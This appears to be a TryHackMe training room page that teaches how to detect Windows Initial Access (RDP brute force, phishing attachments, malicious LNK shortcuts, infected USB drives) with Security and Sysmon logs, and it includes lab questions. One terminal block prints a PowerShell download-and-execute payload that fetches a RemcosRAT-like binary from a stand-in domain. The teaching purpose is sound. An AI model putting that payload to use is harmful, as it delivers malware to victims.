Skip to main contentSkip to main content
Room Banner
Back to all walkthroughs
Room Icon

Windows Threat Detection 1

Explore common Initial Access methods on Windows and learn how to detect them.

medium

60 min

17,604

User profile photo.
User profile photo.
User profile photo.

To access material, start machines and answer questions login.

Now that you've learned about Windows logging in the Windows Logging for room, it's time to put that knowledge into action! This room guides you through common Initial Access and Discovery techniques and teaches how to detect each one using just Windows event logs, the most common log source for real-world teams.

Learning Objectives

  • Explore how threat actors access and breach Windows machines
  • Learn common Initial Access techniques via real-world examples
  • Practice detecting every technique using Windows event logs

Prerequisites 

  • Complete the Windows Logging for room
  • Understand the concept of  tactics and techniques
  • Know core Windows processes, especially the explorer.exe
  • Be ready for a deep dive into Windows threat detection

Lab Access

Before moving forward, start the lab by clicking the Start Machine button below. The will open in split view and will need about 2 minutes to fully load. In case the is not visible, you can click the Show Split View button at the top of the page.

Set up your virtual environment

To successfully complete this room, you'll need to set up your virtual environment. This involves starting the Target Machine, ensuring you're equipped with the necessary tools and access to tackle the challenges ahead.
Target machine
Status:Off

Credentials

Alternatively, you can access the from your own -connected machine with the credentials below:

Username
 
Administrator
 
Password
 
Secure!
 
IP address
 
MACHINE_IP
 
Connection via
 
Answer the questions below

Let's begin!

Initial Access

Before moving on, let's recap the concept of Initial Access. Imagine the cyber world as a big city filled with skyscrapers and tiny apartments - each one protected by its own front door. Now imagine threat actors as criminals roaming the streets at night. Some of them pick the lock of a specific office for weeks. Others smash at doors with brute force. And some just try every city door until they find one left open by mistake.

No matter what the final goal is, the first step of a threat actor is to get through the front door, and the moment an attacker successfully gets in is known as Initial Access. In this room, you will explore various Initial Access methods, but for now, let's divide them into two groups: those requiring an exposed service and those relying on human interaction.

Exposed Services

Three threat groups are trying to breach the server: the first via an exposed RDP, the second via a mail server, and the third via MS SQL

Putting a Windows server directly on the Internet is a common task for IT teams - corporate websites require an open port to show content, a mail server can't handle emails without an active port, and IT admins need to manage the machine remotely. However, every exposed service introduces major security risks. Within minutes, your exposed system can be scanned by automated bots looking for open ports, weak passwords, or unpatched vulnerabilities. And if something is not protected enough, threat actors will use their chance, as proven by these techniques:

User-Driven Methods

Threat actor delivering a phishing email and an infected USB to the victim. The victim starts the attack themselves by opening an email or USB

But how can the laptop be infected if it is not Internet-exposed? Indeed, unless you help the threat actors yourself, it is very hard to infect your laptop. However, people often help threat actors by clicking on malicious links, launching attachments, using pirated software, picking up unknown USB devices, and so on. And since humans are still the weakest link in cyber security and Windows is the most popular for user workstations, you are very likely to handle user-driven Windows Initial Access alerts frequently. The methods are covered by these techniques:

Usage by Threat Actors

Some Initial Access methods are getting popular, and others are declining, and there are many great threat reports on modern Initial Access tendencies (e.g. Mandiant M-Trends 2025 (opens in new tab)). Nevertheless, as a analyst, you should know that threat actors will use every chance to breach the target. For example, major ransomware groups like Medusa (opens in new tab) or Akira (opens in new tab)used all described techniques at least once in their campaigns.

Answer the questions below

Which MITRE technique ID describes Initial Access via a vulnerable mail server?

Which Initial Access method relies on a user opening a malicious email attachment?

Risks of Exposed

As a analyst, you should know that if you expose to the world and set a "12345678" password, your host will be breached within a few days. However, not everyone understands the security risks of an exposed . According to Censys Search (opens in new tab), there are over 5,000,000 -enabled machines right now, and many of them are already under threat actors' control. The problem is so widespread that defenders often call the Ransomware Deployment Protocol, emphasizing how often an breach directly results in a ransomware attack.

Detecting Breach

In our scenario, the IT admin exposed on a production server so that it could be accessed from home on weekends. The credentials were set to Administrator:Summer2025. Let's reconstruct what happened next, just in a few hours, and try to detect it in logs by using Event Viewer (C:\Users\Desktop\Administrator\Practice\ Case\-Security. file):

# Step of Attack Detection Opportunity
1 Network Scan
Botnet scans our IP and detects an exposed  port
N/A. Network attacks are out of the room scope
2 Brute Force
Botnet starts a brute force of common user names
(Administrator, admin, support, etc.)
1. Open Security logs and filter for the failed logins (event ID 4625)
2. Filter for logon types 3 and 10, meaning remote logons
3. Filter for logins from external (use "Source IP" field)
4. That's it. You have detected a potential brute force
3 Initial Access via
After around 100 attempts, the botnet guesses
the correct password and enters the system
1. Continue with the list from the previous step
2. Switch the event ID filter to 4624 (successful logins)
3. Check the account under which the logon was made
4. Now you know which account was used for the Initial Access
4 Further Malicious Actions
Two hours after the breach, the threat actor
logs in via and reviews the Desktop
1. Continue with the list from the previous step
2. Filter for logon type 10, indicating interactive login
3. Copy the "Logon ID" field from the logon event
4. Open logs and search events with the same "Logon ID"
5. You will see all processes started by the threat actor via

Logging Brute Force

Interestingly, it is not that hard to spot an exposed just from the Security logs. If you would assign a public IP to your server, disable the , enable , and wait around an hour - you would see the logs just like on the screenshot. Botnets around the world will immediately start brute forcing your server, generating hundreds of 4625 events that you won't miss! Note, however, that can be breached without a brute force if threat actors knew the credentials in advance (opens in new tab), but that is a topic for another room.

Multiple failed logins per second indicating a brute force attack

For this task, open the and analyze the logs of the breach scenario:
C:\Users\Administrator\Desktop\Practice\ Case\-Security.

Answer the questions below

Which user seems to be most actively brute-forced by botnets?

Which IP managed to breach the host via RDP (Logon Type 10)?

Can you get the real Workstation Name (hostname) of the threat actor?

Current State of

attacks are still a major threat as they can't be mitigated as easily as blocking access. If users have access to the Internet, they will eventually bring malware to their laptops, bypassing the entirely. According to the HoxHunt Trends Report for 2025 (opens in new tab), attacks have increased 41 times since the release of ChatGPT in 2022. Even more, the success rate of these campaigns remains high, meaning users are still falling for them. In this task, we'll focus on two techniques that lead to Windows breaches: malicious binaries and attachments.

Binary Attachments

In Windows, there are lots (opens in new tab) of executable extensions, and while most people know not to open untrusted .exe files, they are usually less cautious about .com, .scr, or .cpl files. However, all of them can contain the malware inside. For example, users are very likely to open the attached "tryhatme.com" file name assuming it to be a link to a meeting invite, not a malicious binary.

To make it worse, Windows hides known file extensions by default, meaning that the file "program.exe" will be shown to you just as "program". Threat actors often abuse it (opens in new tab) by naming their viruses like "invoice.pdf.exe" or "cat.png.com" and changing the icons to fit the topic. See the screenshots below to understand how the malicious file looks for the common user:

Known Extensions Hidden by Default
(invoice.pdf.exe)
.COM Malware Shines if Extensions Are Shown
(tryhatme.com)
File Explorer showing a malicious "invoice.pdf.exe" executable resembling a legitimate PDF file File Explorer showing a malicious "tryhatme.com" executable resembling a website name

Attachments

To avoid detection, threat actors may prefer attaching , Visual Basic, or BAT scripts over binaries. A popular way to make the scripts look trustworthy is to hide them behind shortcuts - the same files you have on your Desktop that point to real executables somewhere in the Program Files folder.

Imagine receiving an email from a local PC store announcing major discounts and asking you to review the details in an attached archive. As in the screenshot below, the Discounts.zip contains two files: a PDF and a shortcut to the website. You carefully analyze the PDF and see that it is just a poster with the latest discounts. Engaged by the news, you rush to open the shortcut, only to find out that it points to a command instead of the legitimate website.

With Payload (Visit Our Website!.)
File Explorer showing a "Visit Our Website!" LNK file that points to a malicious PowerShell code

Threat actors can include any command inside the "Target" field, as well as set any shortcut icon. You can verify it by right-clicking the file, selecting "Properties", and viewing the "Shortcut" tab. The case shown above, for example, downloads and executes a simplified version of RemcosRAT - malware used in many attacks on major companies and government agencies. The terminal below shows a full payload:

Download -> -> RemcosRAT
powershell.exe -c ...
# Download the encoded malware
(New-object System.Net.WebClient).DownloadFile('https://breacheddomain.thm/FILTERED/r.exe','C:\\ProgramData\\r.exe');
# Run the malware (RemcosRAT)
start C:\\ProgramData\\r.exe;

In this task, you will investigate three attachment examples stored in:
C:\Users\Administrator\Desktop\Practice\ Case 1-3

Answer the questions below

Let's play the role of the untrained user and mindlessly open the COM file.
Run the www.skype.com file from the Phishing Case 1 folder, which flag do you get?

Continue with the second attachment from the Phishing Case 2 folder.
From which URL does the malicious LNK download the next stage malware?

Finally, move on to the Phishing Case 3 folder and review its content.
What is the name of the double-extension file you see there?

Detecting Malicious Download

It is relatively simple to hunt for malicious downloads if you know how the victim sees it. First, the user uses a web browser or desktop application to open a attachment. In the simplest case, it would be a direct .exe malware download, but you are far more likely to see an archive attachment like .zip or .rar containing the malware. In this case, can greatly help you detect every attack stage:

Event Chain for Double-Extension Attachment
           # 1. Sysmon Event ID 1: Web browser is launched
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
ParentImage: C:\Windows\Explorer.EXE

# 2. Sysmon Event ID 11: A file (usually archive) appears in Downloads
Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
TargetFilename: C:\Users\User\Downloads\invoice.zip*

# 3. Sysmon Event ID 11: Optionally, the user unarchives files to some folder
Image: C:\Windows\Explorer.EXE (or C:\Program Files\7-Zip\7zG.exe)
TargetFilename: C:\Users\User\Downloads\invoice.pdf.exe

# 4. Sysmon Event ID 1: The user double-clicks the unarchived file
Image: C:\Users\User\Downloads\invoice.pdf.exe
ParentImage: C:\Windows\Explorer.EXE

Process tree of four events in a sequence: MS Edge is launched, Invoice.zip is downloaded, Invoice.pdf.exe is unpacked, and Invoice.pdf.exe is launched

Notes on Attachments

Unlike with binary attachments, files have a very interesting and important capability - they leave little execution trace. Consider the case on the screenshot below, where a user downloaded file that looks like a Google Chrome shortcut, but in fact runs some payload.

After the user launches the shortcut - Windows Explorer reads the "Target" field of the and makes it look like explorer.exe launches directly. Still, you can identify if it was indeed or another attack vector by looking for the preceding file creation events - files must have appeared somewhere in Downloads before:

Event Viewer screenshot showing that LNK execution is not logged, and malicious PowerShell commands will have the "explorer.exe" parent

In this task, let's try to investigate the third case by checking the attached logs:
C:\Users\Administrator\Desktop\Practice\ Case 3\-.

Answer the questions below

Which file did the user download via the web browser?

In which folder did the user unarchive the suspicious file?

What is the process ID of the launched phishing malware?

Finally, which malicious domain did the malware try to connect to?

Risks of Removable Media

Although some may believe that days of infected USB flash drives are long gone and cloud services have replaced them completely, threat actors will disagree, as proven by Camaro Dragon (opens in new tab) or Raspberry Robin (opens in new tab) attacks. Moreover, Initial Access via an infected USB bypasses firewalls, much like , and can start the attack chain even without Internet access and continue spreading without user interaction.

USB Delivery Case

Imagine working for TryHatMe Inc. and receiving a delivery package with a fancy hat and a USB labelled as "A gift from HR". You plug it in, a harmless GIF pops up, and you call HR to thank them for the present. But while the HR figures out what you meant, the malware from the USB has already spread to your laptop. (Real-World Case (opens in new tab))

Print Service Case

Another common scenario involves third-party entities like a print service. Suppose you visit one and hand over your USB to print a document. Their system, already infected with a worm, passes the malware onto your flash drive. Then, you bring the malware back to your home PC, and the infection chain continues. Now, let's learn how to detect this before it's too late! (Real-World Story (opens in new tab))

Detecting an Infected USB

Although there are many advanced techniques on how to run the malware from USB automatically as soon as the flash drive is plugged in, the majority of cases occur just because the user launches malware themselves. For example:

  • Malware hides all legitimate files on USB and creates a malicious "RECOVERY." file
  • Malware creates a "Photos.exe" binary and sets its icon to look like a simple folder
  • Malware creates double-extension copies of all files, like "photo_2024_1_12.jpg.exe"

Interestingly, the detection of Initial Access via USB looks very similar to the attachments. Since both methods rely on a user running malicious binary via a graphical interface (explorer.exe), you may have a hard time understanding how exactly the attack started. Still, in some cases, you may find evidence of execution from external drives like "E:\malware.exe":

A process creation event where the process image starts from an E: disk letter (not the usual C:), indicating that the process originates from a USB

For this task, you will investigate a typical attack chain via USB using the attached logs:
C:\Users\Administrator\Desktop\Practice\USB Case\USB-.

Answer the questions below

Which USB file was launched by the user?

Which suspicious file did the malware drop to the disk?
(Format: full path to the file, e.g. C:\file.txt)

To which other USB did the malware propagate?
(Format: just the letter, e.g. X:)

Great job completing the room! Knowing the common Initial Access methods helps prevent them, and your acquired knowledge of detecting attacks in their first stages will be invaluable for quick alert triage and timely incident response.

Key Takeaways

  • The two most common Windows Initial Access methods are exposed services and user-driven attacks
  • Initial Access via can be easily detected using default authentication logs (4624/4625)
  • User-driven attacks are best detected by process execution events, preferably ones
  • Each Initial Access method (like ) has unique features that you will learn through practice
Answer the questions below

I am ready to move on!

Ready to learn Cyber Security?

TryHackMe provides free online cyber security training to secure jobs & upskill through a fun, interactive learning environment.

Already have an account? Log in

We use cookies to ensure you get the best user experience. For more information see our cookie policy.